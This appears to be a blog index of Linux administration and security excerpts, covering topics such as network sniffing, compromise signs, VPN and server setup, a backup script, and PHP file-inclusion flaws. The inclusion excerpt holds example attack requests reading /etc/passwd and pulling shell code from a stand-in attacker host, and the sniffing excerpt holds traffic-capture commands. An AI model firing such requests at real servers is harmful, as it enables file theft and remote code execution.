Sniffing the Network

December 14th, 2014

This article is intended to provide a simple demonstration of how easy it is to sniff/intercept traffic on various types of networks, and to serve as a reminder to use secure methods of communication on a) untrusted networks and b) known networks where clients or administrators may be untrusted.

The first consideration is the topology of the network we’re connected to. Consider five common scenarios:

  1. Wired ethernet hub network: Hubs are now largely obsolete, having been replaced by switches. Multiple devices can be connected to a hub, and any data received by the hub from one device is broadcast out to all other devices. This means that all devices receive all network traffic. Not only is this an inefficient use of bandwidth, but each device is trusted to accept traffic destined for itself and to ignore traffic destined for other nodes. To sniff such a network, a node simply needs to switch its network interface card to “promiscuous mode”, meaning that it accepts all traffic received (see the sketch after this list).
  2. Wired ethernet switched network: Multiple devices can be connected to a switch, however a switch has greater intelligence than a hub. The switch inspects the traffic sent on each port and learns the hardware (MAC) address of the client connected to that port. Once learned, the switch inspects any frame it receives and forwards it to the known recipient’s port alone. Other devices connected to the switch do not receive traffic that is not destined for them. This offers more efficient bandwidth usage than a hub. Hosts on the network, however, rely on ARP to map IP addresses to MAC addresses, and ARP replies are easily forged, so a switched network can still be sniffed via ARP spoofing.
  3. Wireless open networks: Multiple devices can connect to an open wireless network. All data is broadcast across the network in plain text, and any attacker can sniff/intercept traffic being broadcast across the network. An open wireless network may present the user with a form of hotspot login page before granting internet access, however this does not change the fact that the network itself is open.
  4. WEP encrypted wireless network: A WEP encrypted network requires a WEP key to encrypt and decrypt network traffic. WEP has long been an outdated and insecure method of wireless network protection, and cracking a wireless network’s WEP key is fast and requires little skill. WEP is not secure. In addition, all clients connected to the network use the same WEP key, which means any user on the network who holds the key is able to view traffic transmitted to and from other nodes on the network.
  5. WPA/WPA2 encrypted network: A WPA/WPA2 encrypted network is significantly more secure than a WEP network. Whilst attacks exist on parts of the protocol, and extensions such as WPS, no known attack is able to recover a complex WPA/WPA2 password within an acceptable period of time. Whilst all clients connect to the network with the same password, the protocol is engineered to create different keystreams between each connected client and the access point. This means that simple sniffing in the traditional sense is not possible on the network.
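
As a quick illustration of how little is required on a hub or open network, the sketch below uses tcpdump, which puts the interface into promiscuous mode by default. The interface names are assumptions; adjust them for your system.

# Wired hub: capture everything the card can see; -n skips DNS lookups,
# -w writes the raw packets to a file for later analysis
tcpdump -i eth0 -n -w capture.pcap

# Open wireless: to see other clients' frames the card usually needs to be
# placed into monitor mode first (here via the aircrack-ng suite)
airmon-ng start wlan0
tcpdump -i mon0 -n -w wireless.pcap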

Read the rest of this entry »

Linux: You may have been Compromised when..

December 9th, 2014

There are a number of warning signs that a system has been compromised. The cases below warrant further investigation. Of course, they aren’t all guarantees that your system has been compromised, however they can be strong indicators.

1. Your welcome banner shows the last log in from an unknown/foreign IP address:

Last login: Tue Dec  2 16:08:41 2014 from 190.234.106.143
root@mt:~#

2. The load on a usually idle system is suspiciously high:

root@mt:~# w
 17:06:39 up 62 days, 22:37,  1 user,  load average: 8.12, 8.14, 8.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    pwn              17:03    7.00s  0.00s  0.00s w

This could indicate that unknown processes are running.
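
A quick way to see what is responsible, using standard procps tools rather than anything specific to the box, is to sort the process list by resource usage:

# Top 10 processes by CPU and by memory usage
ps aux --sort=-%cpu | head -n 10
ps aux --sort=-%mem | head -n 10
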
Read the rest of this entry »

Reset Linux Root Password

December 6th, 2014

There are a couple of reasons why you might want to reset a Linux root password. If the current password is known to you, just log in as root and issue the passwd command. What if you’ve forgotten the password and can’t log in? Resetting a Linux root password is simple if you have access to the machine. There are 2 main methods.

Method #1

First, we boot the machine up. If LILO is in use, enter linux init=/bin/bash at the ‘LILO:’ prompt. If GRUB is in use, press ‘e’ at the boot menu to edit the entry, find the kernel line (beginning ‘linux’) and append init=/bin/sh:
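
After the edit (illustrated in the boot step screenshots below), the system boots straight into a root shell. The root filesystem is typically mounted read-only at this point, so a rough sketch of the remaining steps looks like this:

# Remount the root filesystem read-write, set the new password, then flush to disk
mount -o remount,rw /
passwd root
sync
# Remount read-only again and restart the machine (or simply power cycle it)
mount -o remount,ro /
reboot -f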

(Screenshots: Boot Step #1, Boot Step #2, Boot Step #3)

Read the rest of this entry »

Burp Suite: Intercepting & Modifying HTTP Requests & Responses

December 3rd, 2014

Burp Suite is a powerful web application auditor with a huge range of features, from simple to advanced. One of its core features is an intercepting proxy server. This allows us to pass our web traffic through Burp Suite, letting us view and modify both our browser’s requests before they go to the remote web server, and the web server’s responses before they return to our browser.

A couple of common request modifications:

  • Add data to form submissions, modify hidden fields.
  • View and modify browser AJAX data
  • View and edit headers including cookies

And a couple of common response modifications:

  • Remove client side JavaScript (usually validations or other limitations)
  • Add or remove cookies sent to the browser

First, fire up Burp Suite, and browse to Proxy –> Options:
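
The Options tab is where the proxy listener is configured; Burp defaults to 127.0.0.1 on port 8080. Once the listener is running, a simple way to confirm traffic is actually flowing through the proxy (a quick check, assuming the default listener address) is to point a command line client at it:

# Send a request through the Burp listener; it should appear for inspection
# under Proxy -> Intercept
curl -x http://127.0.0.1:8080 http://example.com/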

Read the rest of this entry »

Linux Namespaces

November 23rd, 2014

Starting from kernel 2.6.24, there are six different types of Linux namespaces. Namespaces are useful for isolating processes from the rest of the system, without needing full, low-level virtualization technology.

  • CLONE_NEWIPC: IPC Namespaces: SystemV IPC and POSIX Message Queues can be isolated.
  • CLONE_NEWPID: PID Namespaces: PIDs are isolated, meaning that a process inside the namespace can have the same PID as a process outside it; PIDs inside the namespace are mapped to different PIDs outside of it. The first PID inside the namespace is ‘1’, which outside of any namespace is assigned to init.
  • CLONE_NEWNET: Network Namespaces: Networking (/proc/net, IPs, interfaces and routes) are isolated. Services can be run on the same ports within namespaces, and “duplicate” virtual interfaces can be created.
  • CLONE_NEWNS: Mount Namespaces. We have the ability to isolate mount points as they appear to processes. Using mount namespaces, we can achieve similar functionality to chroot() however with improved security.
  • CLONE_NEWUTS: UTS Namespaces. This namespace’s primary purpose is to isolate the hostname and NIS domain name.
  • CLONE_NEWUSER: User Namespaces. Here, user and group IDs can be mapped so that a process has different IDs inside and outside the namespace, and IDs can be duplicated across namespaces.

Let’s first look at the structure of a C program required to demonstrate process namespaces. The following has been tested on Debian 6 and 7.

First, we need to allocate a page of memory on the stack, and set a pointer to the end of that memory page. We use alloca to allocate stack memory rather than malloc which would allocate memory on the heap.

void *mem = alloca(sysconf(_SC_PAGESIZE)) + sysconf(_SC_PAGESIZE);

Next, we use clone to create a child process, passing the location of our child stack ‘mem’, as well as the required flags to specify the new namespaces. We specify ‘callee’ as the function to execute within the child namespace:

mypid = clone(callee, mem, SIGCHLD | CLONE_NEWIPC | CLONE_NEWPID | CLONE_NEWNS | CLONE_FILES, NULL);

After calling clone we wait for the child process to finish before terminating the parent. If we didn’t, the parent’s execution flow would continue and terminate immediately, taking the child down with it:

while (waitpid(mypid, &r, 0) < 0 && errno == EINTR)
{
	continue;
}

Lastly, we’ll return to the shell with the exit code of the child:

if (WIFEXITED(r))
{
	return WEXITSTATUS(r);
}
return EXIT_FAILURE;

Now, let’s look at the callee function:

static int callee()
{
	int ret;
	/* Mount a fresh /proc so process tools only see PIDs inside this namespace */
	mount("proc", "/proc", "proc", 0, "");
	/* Drop privileges; 'u' holds the target uid/gid (defined in the full listing) */
	setgid(u);
	setgroups(0, NULL);
	setuid(u);
	/* Replace this process with a shell running inside the new namespaces */
	ret = execl("/bin/bash", "/bin/bash", NULL);
	return ret;
}

Here, we mount a /proc filesystem, and then set the uid (User ID) and gid (Group ID) to the value of ‘u’ before spawning the /bin/bash shell.
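
Assuming the snippets above are assembled into a single file, here called ns.c with the usual headers and a main() wrapping the clone/waitpid logic (the file name and layout are assumptions, not taken from the full listing), compiling and running it as root drops us into a shell inside the new namespaces:

gcc -o ns ns.c
./ns        # run as root; clone() with the CLONE_NEW* flags requires CAP_SYS_ADMIN

# Inside the new namespaces the shell sees itself as PID 1, and the freshly
# mounted /proc only contains processes from this namespace
echo $$
ps aux
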
Read the rest of this entry »

Hard Drive Data Recovery

November 13th, 2014

This article discusses hard disk data recovery on Linux using dd and fdisk.

I recently left for a trip to South America, and took my trusty Intenso 320GB external drive with me. Well aware that I’d dropped it a couple too many times and that it had begun to click more and more often during regular usage, I took a full backup before leaving. There’s nothing critical on the drive that I don’t have additional copies of elsewhere, but losing it would be a pain.

Having reached Madrid airport, I plugged the drive in and was about to pull some documents off it when disaster struck. The drive just clicked for about 30 seconds before Windows prompted me to format it. I tried removing it and reinserting it a couple of times but no luck – the drive had failed. I went to the duty free store in the airport and picked up a 1TB WD Elements drive for 99 Euros, and planned to attempt data recovery when I arrived in South America.

I’m keen to get the data recovery started – it’s going to take a while over my laptop’s USB 2.0 connection, and the more bad sectors there are, the longer it will take.
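
The basic approach, sketched below with assumed device and mount point names, is to pull a raw image off the failing disk while skipping unreadable sectors, then work on the image rather than the dying drive:

# /dev/sdb is the failing Intenso drive, /mnt/recovery sits on the new WD disk
# (both names are assumptions). conv=noerror,sync skips bad sectors and pads
# them with zeroes so the image stays aligned.
dd if=/dev/sdb of=/mnt/recovery/intenso.img bs=4096 conv=noerror,sync

# Inspect the partition table inside the recovered image
fdisk -l /mnt/recovery/intenso.img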

Read the rest of this entry »

Nginx, SSL & php5-fpm on Debian Wheezy

October 11th, 2014

I decided to take a break from my love affair with Apache and set up a recent development project on Nginx. I’ve seen nothing but good things in terms of speed and performance from Nginx. I decided to set up a LEMP server (Linux, Nginx, MySQL, PHP), minus the MySQL as it’s already installed on my VM host server, and plus SSL. Here’s the full setup tutorial on Debian Wheezy:

Step #1 – Installing the packages

apt-get install nginx-extras mysql-client
apt-get install php5-fpm php5-gd php5-mysql php-apc php-pear php5-cli php5-common php5-curl php5-mcrypt php5-cgi php5-memcached

MySQL can be installed into the mix with a simple:

apt-get install mysql-server
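
Since SSL is part of the setup, Nginx will need a certificate and key. For a development box a self-signed pair is enough; a rough example (paths are illustrative) is:

mkdir -p /etc/nginx/ssl
openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
  -keyout /etc/nginx/ssl/server.key -out /etc/nginx/ssl/server.crt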

Read the rest of this entry »

Debian Wheezy Xen + Guest Howto

October 8th, 2014

Xen is usually my go-to virtualization technology for Linux. Here’s a HOWTO on setting up Xen on Debian Wheezy and creating the first guest virtual machine.

First step is getting the required packages:

apt-get install xen-linux-system xen-tools xen-utils-4.1 xen-utils-common xenstore-utils xenwatch

Now, we’ll need to specify the Xen kernel as the default boot kernel on the host, and then reboot:
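
One common way to do this on Wheezy, sketched here as a reasonable default rather than the exact steps from the full entry, is to raise the priority of GRUB’s Xen entry and regenerate the configuration:

# Move the Xen GRUB script ahead of the standard Linux entry, then rebuild grub.cfg
dpkg-divert --divert /etc/grub.d/08_linux_xen --rename /etc/grub.d/20_linux_xen
update-grub
reboot
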
Read the rest of this entry »

MySQL Master-Master Replication, Heartbeat, DRBD, Apache, PHP, Varnish MegaHOWTO

October 8th, 2014

I created this HOWTO while building a new development environment today. The intention is to take a single Apache2/Varnish/MySQL environment and scale it to two servers, with one effectively acting as a “hot standby”, increasing redundancy and continuity whilst maintaining current performance. This HOWTO is based on Linux Debian-76-wheezy-64-minimal 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u3 x86_64.

Our current server has IP 192.168.201.1/24 and our new server has IP 192.168.201.7.

Section #1: Set up MySQL Master/Master Replication


First, we’ll set up MySQL master to master replication. In this configuration, data can be written to and read from either host. Bear in mind that issues may arise with auto-increment fields when both hosts are written to at the same time. There are other caveats with replication, so research them, along with how to deal with corruption and repair, before considering this setup for a live application. Also be sure to use the same version of MySQL on both servers – this may not always be necessary, but unless you are very familiar with the changes between versions, not doing so could spell disaster.
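
To work around the auto-increment caveat and enable the binary logging that replication needs, each server gets a unique server-id and interleaved auto-increment settings. A sketch for the first server is below (the file path and values are illustrative, not taken from the full entry; mirror it on the second server with server-id = 2 and auto_increment_offset = 2):

cat >> /etc/mysql/conf.d/replication.cnf <<'EOF'
[mysqld]
server-id                = 1
log_bin                  = /var/log/mysql/mysql-bin.log
auto_increment_increment = 2
auto_increment_offset    = 1
EOF
service mysql restart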

Read the rest of this entry »

Linux Challenge Blackbox #1

October 5th, 2014

I put together a small blackbox challenge this afternoon. Download it now:

Challenge starts here

The challenge covers some Linux file manipulation, C/ASM, GDB and filesystem. Please post questions or feedback in the comments. No spoilers! If you’ve got the master password, contact me privately through the form and if you’re correct I’ll post your details here.

Update 6th Oct 14:00 GMT

I’ve received a lot of questions and requests for clarification. Here are some hints for the first part… 🙂

  1. The download file is hidden on this page. It’s not hard to find!
  2. Linux “file” command is helpful
  3. Make sure you have GDB installed and know how to use it

And for the second part…

  1. I <3 AES 256!

The final key is a 16 byte string padded out to 32 bytes.

The challenge has now been solved, and an excellent and very detailed solution has been posted by reader Remi Pommarel (repk at triplefau dot lt). Here is Remi’s solution:

Spoiler Inside: Challenge Solution

Please feel free to submit your own solutions!

Linux iproute2 multiple default gateways

October 5th, 2014

This article describes a Linux server set up with two interfaces, eth0 and eth1. Each interface has a separate ISP, its own network details and its own default gateway. eth0 has two sets of network details on the same interface, so a virtual interface (eth0:0) must be created to handle the second IP.

By default, Linux only allows for one default gateway. Let’s see what happens if we try to use multiple uplinks with one default gateway. Assume eth0 is assigned 192.168.1.2/24 and eth1 is assigned 172.16.1.5/16. Let’s say our default gateway is 192.168.1.1 (which of course is reached through eth0), but there’s also a 172.16.0.1 gateway on eth1 which we can’t add, as Linux only allows for the one.

Our routing table now looks like this:

root@www1:~# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.1.1     0.0.0.0         UG    0      0        0 eth0
192.168.1.0     0.0.0.0         255.255.255.0   U     0      0        0 eth0
172.16.0.0      0.0.0.0         255.255.0.0     U     0      0        0 eth1

If a packet comes in to us through the 172.16.0.1 gateway from, say, 8.8.8.8, our machine will receive it. When it tries to reply to 8.8.8.8, however, it runs down the routing table, sees that the destination is not local to eth0 or eth1, and therefore routes the reply out through the default gateway (192.168.1.1). The problem is that this is the wrong gateway, so the target machine will ignore our response due to it being out of sequence and from the wrong IP.

Using iproute2, Linux can track multiple routing tables and therefore multiple default gateways. If the packet comes in through one interface and to one IP, it will go out via a specific default gateway. The script to achieve this is as follows:
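
As a minimal sketch of the idea (using the example addresses above, with arbitrary table numbers, rather than the full script from the entry), each source address is pointed at its own routing table, and each table has its own default gateway:

# Table 101: traffic sourced from the eth0 address leaves via 192.168.1.1
ip route add default via 192.168.1.1 dev eth0 table 101
ip rule add from 192.168.1.2 table 101

# Table 102: traffic sourced from the eth1 address leaves via 172.16.0.1
ip route add default via 172.16.0.1 dev eth1 table 102
ip rule add from 172.16.1.5 table 102

ip route flush cache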

Read the rest of this entry »

Debian Linux Wheezy OpenVPN & Squid3 HOWTO with Transparent Proxying

October 4th, 2014

Before my last extended period travelling and using public networks, I decided to set up a new low spec virtual machine on one of my hosted servers. I trust my datacenter and their uplinks more than I trust the free WiFi and public networks I travel through, and so while all my internet traffic is being routed over an encrypted tunnel to my dedicated server, I’m a lot happier.

I threw Squid3 into the mix, as it caches common assets and the sites I visit. This speeds up my web access and page load time.

OpenVPN can be configured more simply with a ‘static key’ configuration, however I’ve chosen to go down the PKI route for future growth. On my new VPN server I run:

apt-get install openvpn

Once OpenVPN is installed, I’ll need to set up my PKI system, certificate authority (CA), server certificate (vpn) and my first client certificate (npn).
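
On Wheezy the easy-rsa 2.0 scripts ship in the OpenVPN package’s examples directory; a rough sketch of the PKI setup (using the certificate names above, but treat the exact commands as an assumption rather than the steps from the full entry) is:

cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0 /etc/openvpn/easy-rsa
cd /etc/openvpn/easy-rsa
. ./vars                  # edit the KEY_* defaults in this file first
./clean-all
./build-ca                # the certificate authority
./build-key-server vpn    # the server certificate
./build-key npn           # the first client certificate
./build-dh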

Read the rest of this entry »

Simple Ready to Roll Linux Backup Script

September 12th, 2014

I built a Linux backup BASH shell script a while ago that I’ve been using since, and wanted to share it today. It’s a simple, easy to configure script that can back up multiple hosts on a schedule, handle both file and MySQL backups, and retain a flexible number of days or copies.

The full source is available here

The global configuration is performed at the top of the script:

#config
MAIN_DIR="/home/sysbackups"
BACKUP_DIR="${MAIN_DIR}/backups"
LOG_DIR="${MAIN_DIR}/logs"

RSYNC="time nice -19 rsync"
SSH=ssh
MYSQLDUMP="time nice -19 mysqldump"
GZIP=gzip
SCP=scp
CAT=cat
RM=rm
CP=cp
RSYNC_ARGS="-arplogu --delete --stats"
TODAY=`date +%Y%m%d`
LOG="${LOG_DIR}/log_error_${TODAY}.log"

The utilities listed all need to be installed: rsync, gzip, scp, time, nice, cat and mysqldump.

The directory structure for backups consists of a master directory, in this case /home/sysbackups, a directory for the actual backups, in this case /home/sysbackups/backups, and a directory for log files, in this case /home/sysbackups/logs. These directories should exist prior to running the script.

The usage of ‘nice’ is to ensure the backups are as resource friendly as possible, and ‘time’ allows for timing data to be provided within the log files created.

Each backup set is defined lower down in the ‘startEntry’ function. Taking the first as an example:

10 )
 STARTED=1
 START="Local: vm1"
 HOST="192.168.1.50"
 B_RSYNC_USER=root
 B_RSYNC=1
 B_RSYNC_LIMIT=4096
 B_RSYNC_DIR=( "/var/www" "/var/spool/cron" "/etc" "/home" )
 B_MYSQLDUMP=1
 B_MULTIPLEDAYS_DB=3
 B_MYSQLDUMP_USER="root"
 B_MYSQLDUMP_MYSQLUSER="root"
 B_MYSQLDUMP_PASS="password"
 B_MYSQLDUMP_HOST="127.0.0.1"
 B_MYSQLDUMP_TMP="/tmp/mysqldump-backup.sql"
 B_MYSQLDUMP_GZIPAFTER=1
 B_MYSQLDUMP_DATABASES=( "all-databases" )
 ;;

The ‘START’ variable defines the “friendly name” of the machine for log purposes, and the ‘HOST’ variable defines its IP address or hostname.

Setting ‘B_RSYNC’ to 1 instructs the script to execute the rsync routines for file backup. Setting ‘B_MYSQLDUMP’ to 1 allows us to back up MySQL databases from the host.

Rsync options

B_RSYNC_USER defines the SSH user to connect to the host as
B_RSYNC_LIMIT defines the transfer limit in kbps
B_RSYNC_DIR is an array of directories to back up

Mysqldump options

B_MYSQLDUMP_USER defines the SSH user to connect to the host as
B_MYSQLDUMP_MYSQLUSER and B_MYSQLDUMP_PASS define the MySQL username and password to connect with
B_MYSQLDUMP_HOST defines the MySQL host to connect to, relative to the HOST variable.
B_MYSQLDUMP_TMP defines a temporary location for the mysql backup on the host
B_MYSQLDUMP_GZIPAFTER defines whether the MySQL backups should be GZipped before being transferred
B_MYSQLDUMP_DATABASES is an array of database names to be backed up, with “all-databases” being hopefully self-explanatory

B_MULTIPLEDAYS_DB defines the number of database copies to keep and B_MULTIPLEDAYS defines the number of file sets to keep.

As we have defined this backup set as case ’10’ in the script, to execute it, we simply run: /path/to/backup.script.sh 10

This can be cronned to run on a daily basis.
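
An example crontab entry (illustrative; adjust the schedule to taste) that runs backup set 10 at 02:30 every day:

30 2 * * * /path/to/backup.script.sh 10 >/dev/null 2>&1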

Lastly, as connections to hosts are made via SSH, either a password will need to be entered on each run manually, or SSH keys can be set up.
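
Setting up key based authentication is a one-off job per host; a minimal sketch, run as the user that executes the backups, is:

# Generate a key pair, then copy the public key to the backup target from the
# example above
ssh-keygen -t rsa -b 4096
ssh-copy-id root@192.168.1.50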

Feel free to reply with changes or comments.

Exim, DKIM and Debian Configuration

July 11th, 2014

DKIM is a system for cryptographically signing messages and confirming that they were sent by a server authorized at the domain level. A private and public key pair is generated: the private key is used to sign outgoing messages, and the public key is published as a DNS TXT record for the domain name. This allows recipients to electronically verify that mail claiming to be from the domain was actually sent by a server authorized to send mail on its behalf. Implementing DKIM in a mail system increases trust and deliverability.

Setting up Exim to sign outgoing mail under DKIM (Domain Keys Identified Mail) is a reasonably quick and simple task. Assuming you’re using an up to date version of Debian with Exim4, the process is even easier.
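
As a sketch of the first step, the key pair can be generated with OpenSSL (the directory and file names are illustrative; the public key is what ends up in the domain’s DNS TXT record):

mkdir -p /etc/exim4/dkim
openssl genrsa -out /etc/exim4/dkim/private.key 2048
openssl rsa -in /etc/exim4/dkim/private.key -pubout -out /etc/exim4/dkim/public.key
# Exim runs as Debian-exim on Debian, so it needs read access to the private key
chown root:Debian-exim /etc/exim4/dkim/private.key
chmod 640 /etc/exim4/dkim/private.key
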
Read the rest of this entry »

PHP Local and Remote File Inclusion (LFI, RFI) Attacks

August 15th, 2013

PHP supports the ability to ‘include’ or ‘require’ additional files within a script. If unsanitized data is passed to these functions, an attacker may be able to achieve remote code execution on the server. A typical include block might look something like this:

<?php
require("config/settings.inc.php");
require("lib/db.lib.php");
require("lib/parser.lib.php");
include("contrib/users/user.contrib.php");
die("This is a test");
?>

Now, it’s also possible to dynamically require or include files based on variables or user input, say for example:
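
The entry continues with that vulnerable pattern; purely as an illustration of the impact, the kind of request an attacker would send against such a script looks like this (the URL and parameter name are hypothetical):

# Local file inclusion: walk up the directory tree to read an arbitrary file
curl "http://victim.example/index.php?page=../../../../etc/passwd"
# Remote file inclusion (requires allow_url_include=On): pull in attacker-hosted code
curl "http://victim.example/index.php?page=http://attacker.example/shell.txt"
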
Read the rest of this entry »